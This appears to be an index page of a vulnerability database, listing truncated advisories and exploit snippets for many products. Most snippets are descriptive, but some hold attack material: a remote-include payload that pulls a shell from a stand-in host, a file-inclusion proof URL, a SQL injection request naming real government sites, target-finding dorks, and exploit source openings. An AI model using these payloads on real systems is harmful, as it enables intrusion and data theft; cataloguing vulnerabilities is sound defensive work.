BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability
No description provided by source. BeyazKurt Script : BP Blog D0rk : "Powered by BP Blog 7.0" thnx : Forever.slam and all WorldHackerz Team! On the WorldHackerz Mirr0r the throne is ours h := ------- Exploit :...
AtomixMP3 M3U/PLS Playlist Parsing Buffer Overflow Vulnerability
AtomixMP3 is a PC mixing program that can blend two songs together. AtomixMP3 has a buffer overflow vulnerability when handling malformed M3U and PLS files; a remote attacker could exploit it to execute arbitrary instructions on the user's machine. AtomixMP3 has a stack overflow when parsing M3U and PLS playlist files that contain an overlong filename (more than 520 bytes). If the user is tricked into loading a malicious playlist file, the vulnerability is triggered and arbitrary instructions are executed. AtomixMP3 AtomixMP3 2.3 AtomixMP3 --------- The vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's homepage for the latest version:...
Huasu Online Game Trading Platform SQL Injection
SQL injection 1: Vulnerable file: /help.asp. The id parameter here is not strictly filtered and is injectable, but conn.asp includes: !--include file="conn.asp"-- !--include file="inc/config.asp"-- % if trimrequest"id" "" then set rs=conn.execute"select from help where id ="trimrequest"id"" order by paixu asc" if not rs.eof then title=rs"helptitle" content=rs"helpcontent" e...
ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution
Vulnerability summary: On October 3, 2014, the foreign security researcher Joshua J. Drake published on his GitHub (https://github.com/jduck) a PoC for a remote command execution vulnerability in ASUS routers (https://github.com/jduck/asus-cmd). The vulnerability was subsequently assigned CVE-2014-9583. The Knownsec security research team studied and analyzed this command execution vulnerability as soon as it appeared. Vulnerability description: ASUS R-series routers use the open-source router system Asuswrt; the open source code made our subsequent vulnerability analysis much easier, with no reverse engineering needed. Asuswrt contains an infosvr process, which listens on 0.0.0.0...
YXcmsApp v1.2.7 Brute-Force SQL Injection
Brief description: As in the title. Details: YXcmsApp's cookie encryption uses the same function as Discuz (dz). Let's look at where the key comes from: protected/apps/install/controller/indexController.php $this-randomcode= substrmd5time, 0, 6; Hmm, only 6 characters, so it is easy to crack; see the test code for the PoC. Register a user, capture the packet to get the value of the yxaut cookie, use the PoC to obtain the key, and then we can control the cookie according to its encryption function. function cpencode$data,$key='',$expire = 0...
Cacti Unspecified Remote Command Execution Vulnerability
Bugtraq ID:66387 CVE ID:CVE-2014-2328 Cacti is a network traffic monitoring and graphing tool built on PHP, MySQL, SNMP and RRDTool. Cacti calls exec-like PHP functions without any security checks, allowing an attacker to submit malicious requests that execute arbitrary commands. 0 Cacti 0.8.7g No detailed solution is available yet: http://www.cacti.net/...
Ecshop Admin Backend Two Local File Inclusion Vulnerabilities
Brief description: A certain function in the whole program does no filtering at all........ leading to....... guess......... Gift requested. Details: The first one is in the \admin\integrate.php file (there are actually many more; I picked two representative ones to submit). code is submitted via POST unfiltered. The second one is in \admin\shipping.php; code is submitted via GET. Proof of vulnerability: I have a 2.php file in the root directory whose content is phpinfo. url:http://127.0.0.1/ec/admin/integrate.php?act=saveucconfig post:code=..%2F..%2F..%2F2...
MDaemon Server WorldClient Script Injection Vulnerability
BUGTRAQ ID: 32355 Alt-N MDaemon is a Windows-based mail server; WorldClient is its client. MDaemon's WorldClient client does not properly filter certain HTML tags in emails; if a remote attacker injects malicious HTML and script code into an email, the injected content is executed in the user's browser session when the user views the email. Alt-N MDaemon 10.0.1 Alt-N ----- The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage: http://www.altn.com...
Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability
No description provided by source. commp3allopass joomla component Remote File Include Vulnerability Component : commp3allopass Download file : http://www.joomlaratings.com Discovered by : NoGe Contact : [email protected]...
EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
No description provided by source. Title: EQdkp <= 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.c...
D-Link DIR-3060 Authenticated RCE Vulnerability (CVE-2021-28144)
Advisory: D-Link DIR-3060 Authenticated RCE CVE-2021-28144 MARCH 11, 2021 Overview The D-Link DIR-3060 running firmware versions below v1.11b04 is affected by a post-authentication command injection vulnerability. Anybody with authenticated access to a DIR-3060 would be able to run arbitrary syst...
Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities(CVE-2018-2698)
Vulnerabilities summary The following advisory describes two (2) guest-to-host escape vulnerabilities found in Oracle VirtualBox version 5.1.30, and VirtualBox version 5.2-rc1. Credit An independent security researcher, Niklas Baumstark, has reported this vulnerability to Beyond Security’s SecuriTeam Secure...
Yonyou U8-OA System /yyoa/ext/https/getSessionList.jsp Sensitive Information Disclosure Vulnerability
No description provided by source...
easysite Content Management System Crude SQL Injection
Brief description: Web services never lie! A large number of gov sites use the easysite content management system. Details: 1. SOAP injection. easysite webservice file: http://www.py.gov.cn/DesktopModules/CInfo/WebService/CInfoService.asmx 2. The ArticleIDs parameter has a SQL injection vulnerability. Just pick one and run it through sqlmap. POST /DesktopModules/CInfo/WebService/CInfoService.asmx HTTP/1.1 Host: dynamic.xmedu.gov.cn...
RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability
No description provided by source. RsGallery2 for Joomla --------------------------------------------------------------------------- Discovered: marriottvn Remote : Yes Level : High --------------------------------------------------------------------------- Affected software description :...
Sudo 1.6.8 Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11204/info Sudo is reported prone to an information disclosure vulnerability. This vulnerability presents itself when sudo is called with the '-e' option, or the 'sudoedit' command is invoked. In certain circumstances,...
Dotproject 2.0 /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...
Hanweb (大汉版通) Multiple Systems Arbitrary File Upload Vulnerability
Brief description: Upload of files of any type; getshell is possible. Affects related versions of jact, jsearch and JCMS; hard to enumerate them all. Details: The affected system versions are those whose WebService has a receivefile operation, usually in the wsInfo service. (Note: the code may differ between products and versions.) 0x1 jsearch public String receivefileString strLoginId, String strPwd, String strKey, DataHandler handler, String filename, int iState String result = "";...
JCMS 2010 Arbitrary File Download Vulnerability
The Hanweb JCMS 2010 content management system is built on the J2EE architecture and designed around a new concept of content management. It provides all the functions needed across the full information lifecycle: content collection, creation, management, delivery, publishing and sharing. In the /module/download/downfile.jsp file, the pathfile and filename parameters are not validated, allowing any file under the WEB directory to be downloaded. JCMS 2010 SEBUG temporary workaround: validate the pathfile and filename parameters properly. ———— http://www.hanweb.com/...
Pligg Multiple Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities
BUGTRAQ ID: 37185 Pligg is an open-source content management system that is free to download and use. Pligg does not properly filter user input submitted to admin/adminconfig.php, admin/adminmodules.php, delete.php, editlink.php, submit.php, submitgroups.php, ...
Net-SNMP GETBULK Request Integer Overflow Denial of Service Vulnerability
CVE(CAN) ID: CVE-2008-4309 Net-SNMP is a free, open-source SNMP implementation, formerly known as UCD-SNMP. Net-SNMP's implementation has a vulnerability that a remote attacker could exploit to cause a denial of service on the server. The problem lies in the netsnmpcreatesubtreecache function in agent/snmpagent.c: a specially crafted malformed SNMP GETBULK request causes an integer overflow in that function, and the service process crashes during subsequent processing. 0 Net-SNMP net-snmp 5.4.x 5.4.2.1 Net-SNMP net-snmp 5.3.x 5.3.2.3 Net-SNMP net-snmp 5.2...
T-Site Website Building System /AjaxFile/DownLoadFile.aspx FilePath Parameter Arbitrary File Download Vulnerability
No description provided by source...
deV!L`z Clanportal 1.5.2 - Remote File Include Vulnerability
No description provided by source. + deV!Lz Clanportal 1.5.2 Remote File Include Vulnerability + Discovered By: cr4wl3r + Download: http://www.dzcp.de/downloads/?action=download&id=131 x Code in dzcp1.5.2/inc/config.php REQUIRES requireonce$basePath./inc/mysql.php; --- RFI function show$tpl, $arr...
JBoss RichFaces Remote Code Execution Vulnerability (CVE-2013-2165)
Bugtraq ID:61085 CVE ID:CVE-2013-2165 JBoss RichFaces is a web framework with Ajax and JSF features. RichFaces ResourceBuilderImpl has a security vulnerability in its handling of deserialization, allowing a remote attacker to send specially crafted data that executes the deserialization methods of any serializable class deployed on the server. The severity of the impact depends on the deserialization logic of those classes. 0 JBoss RichFaces Vendor solution: users can refer to the following vendor security advisory for patch information: https://rhn.redhat.com/errata/RHSA-2013-1041.html...
Yonyou DNS Zone Transfer Leak Vulnerability
Brief description: DNS zone transfer leak vulnerability. Details: This server is not configured correctly: ns1.ufsoft.com.cn Trying Zone Transfer for yonyou.com on ns1.ufsoft.com.cn ... yonyou.com 3600 IN SOA yonyou.com 3600 IN A 125.35.5.132 yonyou.com 3600 IN NS yonyou.com 3600 IN NS yonyou.com 3600 IN NS yonyou.com 3600 IN MX yonyou.com 3600 IN TXT ns3.ufsoft.com.cn...
Firefox XSL Parsing root XML Tag Memory Corruption Vulnerability
BUGTRAQ ID: 34235 CVE(CAN) ID: CVE-2009-1169 Firefox is a very popular open-source web browser. Firefox does not correctly handle error conditions when transforming XML documents; specially crafted XSLT code may cause a temporary, corrupted stack variable to be treated as the evaluation context object. The cause is that evalContext is stack-allocated but is still referenced by the txExecutionState object in the failure case, and that object's destructor later tries to delete evalContext. An attacker who successfully exploits this vulnerability could crash the browser or execute arbitrary code on the user's machine. Mozilla Firefox 3.0.8 Mozilla SeaMonkey 1.1.16...
Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2021-31181)
CVE-2021-31181: MICROSOFT SHAREPOINT WEBPART INTERPRETATION CONFLICT REMOTE CODE EXECUTION VULNERABILITY June 02, 2021 | The ZDI Research Team In May of 2021, Microsoft released a patch to correct CVE-2021-31181 – a remote code execution bug in the supported versions of Microsoft SharePoint Serve...
XXE in WeChat Pay SDK
Background “Mobile payments surge to $9 trillion a year, changing how people shop, borrow—even panhandle”, as WSJ.com once reported. As a payment security researcher, I occasionally found a perilous problem about WeChat Pay which I think may be easy to make use of. Therefore, I hope to be able to...
Node.js arbitrary file read Vulnerability(CVE-2017-14849)
Author: niubl@TSRC 1. Vulnerability description On 2017-9-28, the company's scanner found an instance of an arbitrary file read vulnerability in a business system; the team's follow-up analysis found that this is a common vulnerability arising from the combination of Node.js and Express. As we prepare...
Linux lp.c Out-of-Bounds Write via Kernel Command-line
Vulnerable Versions Linux 4.12-rc1 and below Linux 3.x Linux 2.6.x Linux 2.4.x Linux 2.2.x Mitigation Patch has been committed to the mainline tree, available in the 4.12-rc2 release. 3.18 / 4.4 stable releases with the patch are also available, see timeline. Technical Details Due to a missing...
xpshop Online Store System SQL Injection (Official Site Demo)
Brief description: Details: Vulnerability location: xpshop.webui.MyRefund protected void PageLoadobject sender, EventArgs e if base.CurrentUser == null string str = "Login.aspx?ReturnUrl=/" + WebUIBase.ShopFolder + "MyRefund.aspx"; base.Response.Redirect"/" + WebUIBase.ShopFolder + str; else if base.CurrentUser.Name == "anonymous"...
Apache Struts ClassLoader Manipulation Vulnerability
CVE ID:CVE-2014-0094 Struts2 is a second-generation Java enterprise web application framework based on the Model-View-Controller (MVC) pattern. The application allows access to the "class" parameter, which maps directly to the "getClass()" method; this can be exploited to manipulate the ClassLoader of the application server in use. 0 Apache Struts 2.x Vendor patch: Apache ----- The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage: http://struts.apache.org/release/2.3.x/docs/s2-020.html...
Pligg <= 9.9.0 (XSS/LFI/SQL) Multiple Remote Vulnerabilities
No description provided by source. Pligg <= 9.9.0 Multiple Vulnerabilities July 31, 2008 Vendor : Pligg, LLC URL : http://www.pligg.com/ Version : Pligg <= 9.9.0 Risk : Multiple Vulnerabilities Description: Pligg is a popular open source, full featured, content management system written in php. The...
Cisco Unified IP Phone SCCP and SIP Protocol Multiple Remote Security Vulnerabilities
BUGTRAQ ID: 27774 CVE(CAN) ID: CVE-2008-0530,CVE-2008-0526,CVE-2008-0527,CVE-2008-0528,CVE-2008-0529,CVE-2008-0531 Cisco Unified IP Phone is Cisco's unified IP telephony solution. DNS response parsing overflow: Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices running SCCP and SIP firmware have a buffer overflow vulnerability when processing DNS responses; a specially crafted DNS response can trigger the overflow and execute arbitrary instructions on the vulnerable phone. This vulnerability is recorded as CVE-2008-0530 and Cisco...
Apache HTTP Server Worker Process Multiple Local Denial of Service Vulnerabilities
BUGTRAQ ID: 24215 CVE(CAN) ID: CVE-2007-3304 Apache HTTP Server is a popular web server. The Apache HTTP Server worker process implementation has multiple vulnerabilities that a local attacker could exploit to make the service unavailable. Before sending a signal, Apache HTTP Server does not verify that the target process is an Apache child process. A local attacker who can run scripts on the Apache HTTP Server can control the scoreboard and terminate arbitrary processes, causing a denial of service. If Apache httpd is installed with the Prefork...
Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
No description provided by source. !/bin/bash $Id: raptordominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $ raptordominohash - Lotus Domino R5/R6 HTTPPassword dump Copyright c 2007 Marco Ivaldi [email protected] Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, ...
Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability( CVE-2017-2824)
Official patch earlier to fix the vulnerabilities: the Zabbix database write vulnerability The vulnerability lies within the "Trapper" section of the Zabbix Code, this is the network service that allows the Proxies and the Server to communicate TCP Port 10051 There are a set of API calls that the...
Topsec (天融信) TopApp-AD /acc/vpn/download.php Download Vulnerability
No description provided by source...
Linux & BSD umount Local Root Exploit
No description provided by source. / Reminder - Be sure to fix the includes /str0ke / -------------------------------------- linuxumountexploit.c ---------- include include include include include include define PATHMOUNT /bin/umount define BUFFERSIZE 1024 define DEFAULTOFFSET 50 ulong getesp...
Tomcat 3.0/3.1 Snoop Servlet Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1532/info A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting a nonexistent file with the .snp extension, too much information is...
Calibre E-Book Reader Local Root Race Condition Exploit
No description provided by source. !/bin/sh .70-Calibrer Assault Mount by Dan Rosenberg @djrbliss and zx2c4 Yesterday we learned how Calibre's ability to mount anything anywhere resulted in a local root. Today's exploit shows a race condition to subvert recent changes preventing symlinks and...
TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities
No description provided by source. ====================================================================== TikiWiki <= 1.9.8.1 Local File Inclusion ====================================================================== Author: L4teral l4teral 4t gmail com Impact: Local File Inclusion Status: patch...
JBoss JMX Console Beanshell Deployer WAR upload and deployment
No description provided by source. $Id: jbossbshdeployer.rb 11533 2011-01-10 14:34:24Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms o...
fckeditor 2.4.3 upload.php Arbitrary File Upload Vulnerability in a PHP Environment
No description provided by source...
CMScontrol "id_menu" SQL Injection Vulnerability
A vulnerability has been reported in CMScontrol, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "idmenu" parameter in index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injectin...
mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns
No description provided by source. Title : mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities Discovered By OLiBekaS ----------------------------------------------------------------------------- Affected software description : Application : mail for phpbb bulletin board/forum software...
PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Exploit for PHP-Fusion 6.00.3 Released Coded by:[email protected] Greetz: http://www.curityreason.com use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; if!$ARGV3 printEOF; Exploit for PHP-Fusion 6.00.3 Released Coded by krasza...
F5 Networks Multiple Vulnerabilities (CVE-2021-22986, CVE-2021-22987, CVE-2021-22988, CVE-2021-22989, CVE-2021-22990, CVE-2021-22991, CVE-2021-22992)
...
Visual Studio Code remote code execution vulnerability
I occasionally noticed that Visual Studio Code was listening on a fixed TCP port 9333. After upgrading to 1.19.3, it’s gone. ➜ netstat -an | grep 9333 tcp4 0 0 127.0.0.1.9333 . LISTEN Looks like it’s a bug that affects VSCode 1.19.0-1.19.2. The extension process always runs in debug mode, because of th...
Oracle Knowledge Management XXE Leading to a RCE
Vulnerability Summary The following advisory describes an Information Disclosure vulnerability found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle’s InQuira knowledge management products offer simple and convenient ways for users to access knowledge tha...